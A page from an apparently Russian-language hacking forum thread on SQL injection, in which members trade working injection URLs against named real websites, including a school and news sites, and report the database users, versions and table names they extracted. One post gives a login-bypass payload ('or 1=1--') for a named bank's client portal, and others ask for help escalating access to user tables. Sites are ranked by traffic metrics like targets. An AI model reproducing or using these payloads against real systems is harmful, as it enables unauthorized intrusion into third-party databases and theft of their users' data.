SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Drager

    Drager Member

    Joined:
    2 Nov 2011
    Messages:
    12
    Likes Received:
    16
    Reputations:
    32
    [PR=3]
    Code:
    http://www.killfromtheheart.com/albums.php?id=2128[COLOR=Orange]+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,CONCAT_WS(CHAR(45,45),USER(),VERSION(),DATABASE()),15,16,17,18,19,20+--+[/COLOR]
    [email protected]_data

    Code:
    http://www.killfromtheheart.com/[COLOR=Pink]admin[/COLOR]/
     
  2. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    #14362 tabletkO, 24 Nov 2011
    Last edited: 24 Nov 2011
  3. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Банк?

    ну раз пошло такое дело

    https://client.uniastrum.ru/Login.aspx?ReturnUrl=%2fdefault.aspx

    login: hi' or 1=1--
    pass: hi' or 1=1--
     
    1 person likes this.
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    "Американский Кризис "=/

    Site:www.americancrisis.us

    PR=4
    Alexa=2 862 020

    Inject
    Code:
    _ttp://www.americancrisis.us/Home.php?MI=9[COLOR=Magenta]+and+1=2+union+select+null,null,null,database(),null,null,null,null,null,null[/COLOR] 
    Version:4.1.20-max-log
    Database:JanAFC_genweb
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    "Африканский Кризис" =/

    Site:www.picknclick.biz

    PR=3

    Alexa=8 991 159

    Inject
    Code:
    _ttp://www.picknclick.biz/Home3.php?S=11[COLOR=Magenta]+and+1=2+union+select+1,2,3,database(),5,6,7,8,9,10,11,121,31,4,15,16,17,18,19,20,21+--+[/COLOR]
    Version:4.1.20-max-log
    Database:JanAFC_picknclick
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    "Исторический Кризис" =/

    Site:www.historyreviewed.com

    PR=3

    Alexa=15 242 051

    Inject
    Code:
    _ttp://www.historyreviewed.com/Home.php?MI=243[COLOR=Magenta]+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10[/COLOR]
    Version:5.0.91-log
    Database:jangdgenweb
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    "Трудовой Кризис" =/

    Site:www.drudgereportarchives.net

    PR=3

    Alexa=2 905 350

    Inject
    Code:
    _ttp://www.drudgereportarchives.net/Home.php?MI=277[COLOR=Magenta]+and+1=2+union+select+1,2,3,version(),null,6,7,8,9,10[/COLOR]
    Version:4.1.20-max-log
    Database:JanAFC_genweb
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    "Рыночный Кризис" =/

    Site:www.stocktipster.net

    PR=3


    Inject
    Code:
    _ttp://www.stocktipster.net/Home.php?MI=124[COLOR=Magenta]+and+1=2+union+select+1,2,3,version(),null,6,7,8,9,10[/COLOR]
    Version:4.1.20-max-log
    Database:JanAFC_genweb
    User:[email protected]
     
    _________________________
    1 person likes this.
  5. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    290
    Likes Received:
    89
    Reputations:
    1
    http://www.artem.ua/news/index.php?id_art=99{sql}
    DB Server: MySQL >=4.1
    Current DB: webartem
    Нашел только табличку news может кто поможет раскрутить?
     
  6. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    ТИЦ 160
     
  7. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    HTML:
    http://www.artem.ua/news/index.php?id_art=-1+union+select+1,version(),3,4,5,6,7,8,9,10--+1
    4.1.25-log
     
    #14367 tabletkO, 24 Nov 2011
    Last edited: 24 Nov 2011
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    PR 6 Тиц 3500

    Тиц 3500

    DB User: 'mba'@'localhost'
    Host Name: nn1.r52.ru
    Sql Version: 5.0.51a

     
  9. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    site:forum.antichat.ru r52.ru
     
  10. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    Code:
    http://love.pankotskiy.ru/stat.php?id=1
    Code:
    http://www.blog-seo.ru/index-stat.php?id=6
    есть табла с юзерами(~1к)
    Code:
    http://brest-school-20.by/stat.php?id=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--
     
    #14370 BLurpi^_^, 24 Nov 2011
    Last edited: 24 Nov 2011
    1 person likes this.
  11. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Code:
    http://www.blog-seo.ru/index-stat.php?id=-6+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=0x646c655f7573657273+--+
    Code:
    http://love.pankotskiy.ru/stat.php?id=-1%27+Union+select+1,2,3,4,5,6,7,8,9,group_concat%28version%28%29,user%28%29,database%28%29%29,11,12,13+from+information_schema.tables+--+
    Примерно так... Просто докрутил.
     
    2 people like this.
  12. kallstrom

    kallstrom Member

    Joined:
    19 Mar 2010
    Messages:
    36
    Likes Received:
    10
    Reputations:
    5
    Этого вроде не было... Учите английский!))


    PR=4
    тИЦ=2800
    Alexa=71,160
     
    1 person likes this.
  13. kallstrom

    kallstrom Member

    Joined:
    19 Mar 2010
    Messages:
    36
    Likes Received:
    10
    Reputations:
    5
    Аренда квартир в Москве

    PR=6
    тИЦ=110
    Alexa=481,897
     
  14. tght

    tght Member

    Joined:
    24 Jun 2010
    Messages:
    134
    Likes Received:
    10
    Reputations:
    0
    тИЦ: 450, PR - 6, Alexa - 1,255,744.

    5.1.49-1ubuntu8.1
    [email protected]

    DB: rfdeti
     
    #14374 tght, 24 Nov 2011
    Last edited: 25 Nov 2011
  15. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    445
    Likes Received:
    130
    Reputations:
    106
    ТИЦ: 150

    [email protected]
    5.1.36-log
     
  16. kallstrom

    kallstrom Member

    Joined:
    19 Mar 2010
    Messages:
    36
    Likes Received:
    10
    Reputations:
    5
    Шины Dunlop

    PR=4
    тИЦ=250
    Alexa=439,159
     
  17. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    445
    Likes Received:
    130
    Reputations:
    106
    Весьма бесполезный ресурс:


    thegotom_momdb@localhost
    5.0.92-community
     
  18. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    445
    Likes Received:
    130
    Reputations:
    106
    5.0.27-community

    Всё классно.. с авторизацией так и не разобрался.. таблица паролем admin_pass
     
  19. PRosTo_LEva

    PRosTo_LEva Elder - Старейшина

    Joined:
    18 Apr 2007
    Messages:
    445
    Likes Received:
    130
    Reputations:
    106
    5.0.92-community

    4.1.22

    хочу плюсик (^^,)
     
    1 person likes this.
  20. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Нет доступа :(

    4.1.25-log

     
    #14380 stepashka_, 25 Nov 2011
    Last edited: 25 Nov 2011
    2 people like this.
Thread Status:
Not open for further replies.